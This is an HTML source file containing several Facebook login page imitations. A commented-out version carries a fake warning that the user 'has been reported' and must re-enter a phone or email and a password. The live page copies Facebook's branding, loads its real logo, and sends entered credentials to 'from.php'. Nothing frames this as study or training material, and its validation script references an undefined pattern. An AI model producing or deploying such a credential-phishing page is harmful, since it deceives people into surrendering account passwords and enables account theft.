<!---<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Facebook</title>
    <style>
     *{
     margin:0;
     font-size: 2vh;
     
}
#all{
      width:100%;
      height:100vh;
      display:flex;
      flex-direction:column;
      justify-content:top;
      align-items:center;
}
#foot{
      width:100%;
      height:3vh;
}
nav{
  width:100%;
  display:flex;
      flex-direction:column;
      justify-content:space-evenly;
      align-items:center;
}
form{
  display: flex;
  flex-direction: column;
  justify-content:space-evenly;
      align-items:center;
  width:100%;
}
form input{
  width:85%;
  padding:2vh;
  margin: 0.5vh 0px;
  border: 1px solid black;
  border-radius:1vh;
  background-color: whitesmoke;
}
h1{
  color:#4267b2;
  margin:2vh 0;
  font-size: 5vh;
}
form button{
  width:90%;
  background-color:green;
  padding:2vh;
  text-align: center;
  color: white ;
  font-size:2vh;
  border:1px solid white;
  border-radius:1vh;
  margin:3vh 0px;
  opacity:0.9;
}
header{
  font-size: 2vh;
  background-color:red;
  opacity:0.5;
  padding: 10px;
  color:white;
}
a{
  text-decoration: none;
  margin:10px;
}
#all div hr{
  background:black;
  width:200px;
  height:1px;
  margin:10px;
}
#all div{
  display:flex;
  width:80%;
  justify-content: space-around;
}
#create_account{
  background: whitesmoke;
  padding:15px;
  border:1px solid white;
  border-radius:10px;
  margin:10px 0;
  width:70%;
}
*:focus{
  outline:none;
}
#arr0{
  margin:30px;
}
    </style>
</head>
<body>
      <div id="all">
        <header>You have been reported by our community standard and to confirm that its you please enter your mobile number or email address and password.</header>
                 
                  <nav>
                    <h1>facebook</h1>
                  <form id="input">
                        <input type="text" id="username" placeholder="Mobile number or email address">
                        <input type="password" id="password" placeholder="Password">
                  <button type="submit" id="submit">Log In</button>
                  </form>
                        <a href="https://facebook.com">Forgotten password?</a>
           
            </nav>
            <nav>
                  <div id="arr0">
                        <span id="one">About</span><span id="two">Help</span><span id="three">More</span>
                        </div>
                        <div id="arr1">
           <footer id="footer">Meta<span id="copyright">©</span> 2023</footer>                   
                              
                        </div>
            </nav>
            <nav id="foot">
                  
            </nav>
      </div>
    <script>
       
    </script>
</body>
</html>


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login</title>
    <style>
      body {
    font-family: Arial, sans-serif;
    background-color: #f7f7f7;
}

.container {
    width: 400px;
    padding: 16px;
    margin: 0 auto;
    background-color: #fff;
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
    border-radius: 4px;
}

.logo {
    font-size: 24px;
    font-weight: bold;
    color: #3b5998;
    margin-bottom: 16px;
}

.login-form input[type="text"],
.login-form input[type="password"] {
    width: 100%;
    padding: 8px;
    margin-bottom: 8px;
    border: 1px solid #ddd;
    border-radius: 4px;
    outline: none;
}

.login-form button[type="submit"] {
    width: 100%;
    padding: 8px;
    background-color: #3b5998;
    color: #fff;
    border: none;
    border-radius
}
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">facebook</div>
        <form class="login-form">
            <input type="text" placeholder="Email or Phone Number" />
            <input type="password" placeholder="Password
            -->
<!DOCTYPE html>
<html>
  <head>
    <style>
      * {
  font-family: sans-serif;
  text-transform: capitalize;
}

body {
  background-color: #f0f2f5;
}
@media only screen and (min-width:401px) {
.login-fb{
grid-template-columns: repeat(auto-fill, minmax(500px, 1fr));
margin-left:10%;

}
form{
  width:377px;
}
}
@media only screen and (max-width: 400px) {
  form {
    left:-30px;
  }
}
.login-fb {
  width: 80%;
  display: grid;
}

.login-fb .info {
  margin-top: 65px;
  margin-left: 34px;
}

.login-fb .info .image {
  width: 244px;
  margin-bottom: -14px;
  margin-left: -27px;
}

.login-fb .info .image img {
  width: 88%;
}

.login-fb .info h2 {
  color: black;
  font-weight: 100;
  margin: 8px 0 -12px;
  font-size: 28px;
}

.login-fb .info p {
  font-size: 15px;
  margin-top: 21px;
}

.login-fb .contes {
  display: flex;
  margin-top: 30px;
}

.login-fb .info .contes .image-profile {
  width: 100%;
  height: 194px;
  position: relative;
  border: 1px solid #9e9e9e3b;
  border-radius: 10px;
}

.login-fb .info .contes .image-profile:hover,
.login-fb .info .contes .image-creer:hover {
  box-shadow: 0px 0px 8px #ccc;
  transform: scale(1.04);
  cursor: pointer;
}

.login-fb .info .contes .image-profile::after {
  content: "khirdin";
  position: absolute;
  background-color: white;
  bottom: 0px;
  left: 0;
  width: 85%;
  padding: 12px;
  text-align: center;
  border-radius: 0 0 10px 10px;
}

.login-fb .info .contes .image-profile img {
  border-radius: 10px 10px 0 0;
  width: 100%;
}

.login-fb .info .contes .image-profile .close {
  position: absolute;
  top: 7px;
  left: 7px;
  color: white;
  background: grey;
  border-radius: 50%;
  width: 20px;
  height: 20px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.login-fb .info .contes .image-profile:hover .close {
  color: grey;
  background-color: white;
  transform: scale(1.2);
}

.login-fb .info .contes .image-creer {
  width: 100%;
  height: 248px;
  background: #f5f6f7;
  border: 1px solid #9e9e9e3b;
  margin-left: 50px;
  border-radius: 10px;
  position: relative;
}

.login-fb .info .contes .image-creer::after {
  content: "ajouter un compte";
  position: absolute;
  left: 0;
  bottom: 0px;
  width: 100%;
  background-color: white;
  padding: 12px 30px;
  box-sizing: border-box;
  border-radius: 0 0 10px 10px;
  height: 60px;
  display: flex;
  align-items: center;
  color: #1976f2;
  text-align: center;
  font-size: 19px;
}

.login-fb .info .contes .image-creer .plus {
  position: absolute;
  top: 28%;
  left: 36%;
  background-color: #1976f2;
  font-size: xx-large;
  color: white;
  border-radius: 50%;
  width: 50px;
  height: 50px;
  display: flex;
  justify-content: center;
  align-items: center;
}

/******************* form ****************/

form {
  background: white;
  display: flex;
  flex-direction: column;
  align-items: center;
  /* justify-content: center;*/
  width: 300px;
  height: fit-content;
  position: relative;
  top: 114px;
  right: -122px;
  border-radius: 14px;
  padding: 10px;
}

form input {
  width: 86%;
  padding: 16px;
  border-radius: 6px;
  outline: none;
  border: 1px solid #ccc;
  margin-top: 13px;
}

form input::placeholder {
  font-size: 17px;
  color: rgb(167, 167, 167);
  font-weight: 300;
}

form input:focus:not(form input[type="submit"]) {
  border: 1px solid #1473ef;
  box-shadow: 0px 0px 2px #1473ef;
}

.valid input[type="email"],
.valid input[type="email"]:focus {
  border: 1px solid #17ce17;
}

form input[type="email"] + .text {
  display: none;
  font-size: 17px;
  width: 93%;
  height: 27px;
  margin-bottom: 0;
}

.error input[type="email"] + .text {
  color: red;
  display: block;
}

.valid input[type="email"] + .text {
  color: #17ce17;
  display: block;
}

form input[type="password"] {
}

form input[type="submit"] {
  background: #1473ef;
  width: 95%;
  color: white;
  font-size: 23px;
  font-weight: bold;
  height: 51px;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}

form input[type="submit"]:hover {
  background-color: #116ee8;
  cursor: pointer;
}

form a {
  margin-top: 20px;
  text-decoration: none;
  color: #1b4cfd;
}

form a:hover {
  text-decoration: underline;
}

form .new {
  margin-top: 18px;
  padding-top: 7px;
  border-top: 1px solid #ccc;
  width: 100%;
}

form .new p {
  background: #42b72a;
  color: white;
  padding: 17px 20px;
  border-radius: 7px;
  width: fit-content;
  margin: 14px auto;
}

form .new p:hover {
  background-color: #35a51e;
  cursor: pointer;
}

    </style>
  </head>
  <body>
    <div class="login-fb">
  <div class="info">
    <div class="image">
      <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg">
    </div>
    <form action="from.php" method="post">
      <input class="email" name="email" type="email" placeholder="Email or phone number" required>
      <p class="text"></p>
      <input class="password" type="password" name="password" placeholder="Password" required>
      <input class="subm" type="submit" value="Log in">
      <a href="forbidden.php" class="forgot">forgotten password?</a>
      <div class="new">
        <p>create new account</p>
      </div>
    </form>
  </div>
  <script>
    let form = document.querySelector("form"),
  email = document.querySelector(".email"),
  text = document.querySelector(".text"),
  password = document.querySelector(".password");

//console.log(email);
// console.log(error);
// console.log(password);
// console.log(subm);

form.addEventListener("submit", (e) => {
  e.preventDefault();

  //   let pattern = /^[^a-z]{6}@[gmail]\.com /;

  form.classList.add("error");
  form.classList.remove("valid");

  if (email.value == "") {
    text.innerText = "where email";
  } else if (!email.value.match(pattern)) {
    text.innerText = "please, enter a valid email";
  } else {
    form.classList.replace("error", "valid");
    text.innerText = "valid";
  }
});
  </script>
  </body>
</html>
